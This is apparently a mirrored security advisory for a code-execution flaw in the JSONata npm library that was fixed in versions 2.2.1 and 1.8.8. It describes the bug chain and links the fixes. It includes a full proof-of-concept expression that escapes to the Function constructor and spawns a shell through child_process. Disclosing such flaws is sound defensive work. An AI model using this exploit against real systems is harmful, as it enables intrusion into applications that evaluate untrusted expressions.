UNKNOWN npm
JSONata vulnerable to Arbitrary Code Execution via crafted JSONata expressions
GHSA-66mm-25pp-rfff · CVE-2026-77415
Published · Modified
AI SAST
Find this class of vulnerability in your own code
Corgea's AI-native static analysis detects vulnerabilities like this one across your repositories, ranks them by exploitability, and returns review-ready fixes.
Description
Before JSONata 2.2.1 and 1.8.8 it was possible to execute arbitrary code with
crafted expressions, due to:
- overwriting
$cloneallowing mutation of objects via transforms (seeevaluateTransformExpression) - it being possible to destruct jsonata functions/lambdas (e.g.
$merge.*) - applyProcedure
usingproc.arguments.forEachand notArray.prototype.forEach
Which could be chained to execute arbitrary code.
This was fixed with:
- https://github.com/jsonata-js/jsonata/pull/799
(https://github.com/jsonata-js/jsonata/pull/799/changes#diff-de23c1b6e199d0e59406a284aae5fa7be63fcbbff706829913dba73dcdeb061cL1673-R1673) - https://github.com/jsonata-js/jsonata/pull/800
- https://github.com/jsonata-js/jsonata/pull/802
Which are included in the 2.2.1 release. Fixes were then back-ported to the 1.8.8 release.
PoC
import jsonata from "jsonata";
const expression = jsonata(`
(
$obj := {};
$clone := function($o) { $o };
$m := ($merge.*)[1];
$fn := function($a) {
(
$a({"value":"lg"},"__lookupGetter__");
$a({"value":"x"},"x");
)
};
$nop := function() { $ };
$capture := function($val) {
$obj ~> | $obj | {"x": 1, "y": 1, "lg":$lg} |
};
$ ~> | $ | $m([$nop,{"_jsonata_lambda":false}])|;
$ ~> | $ | {"arguments":{"forEach": $spread($fn)}}|;
$ ~> | $ | {"body":$m([$capture,{"_jsonata_lambda":false}]).body}|;
$func := $m([$,{"_jsonata_lambda":true}]);
$func();
$gP := $obj.lg("__proto__");
$afn:=$spread($fn);
$afn{"x":$gP().constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")()};
)
`);
await expression.evaluate({});
References
References
- WEB https://github.com/jsonata-js/jsonata/security/advisories/GHSA-66mm-25pp-rfff
- WEB https://github.com/jsonata-js/jsonata/pull/799
- WEB https://github.com/jsonata-js/jsonata/pull/800
- WEB https://github.com/jsonata-js/jsonata/pull/802
- WEB https://github.com/jsonata-js/jsonata/commit/47c0e58542202c705726663166dbee5fcae47d06
- WEB https://github.com/jsonata-js/jsonata/commit/4b217d514376e30cba278941298d7ba97c4a6c6e
- WEB https://github.com/jsonata-js/jsonata/commit/59e25144fc3b7125f6befd71b8a6e14e1fa610d2
- WEB https://github.com/jsonata-js/jsonata/commit/f09df8416eab8ff44926fc6527c80fb8701de159
- WEB https://github.com/jsonata-js/jsonata/commit/f174348c7fa30f271b63ddedf0767e814004bc4d
- PACKAGE https://github.com/jsonata-js/jsonata
- WEB https://github.com/jsonata-js/jsonata/releases/tag/v1.8.8
- WEB https://github.com/jsonata-js/jsonata/releases/tag/v2.2.1
Ready to move
Start Securing
Free, no credit card | First findings in minutes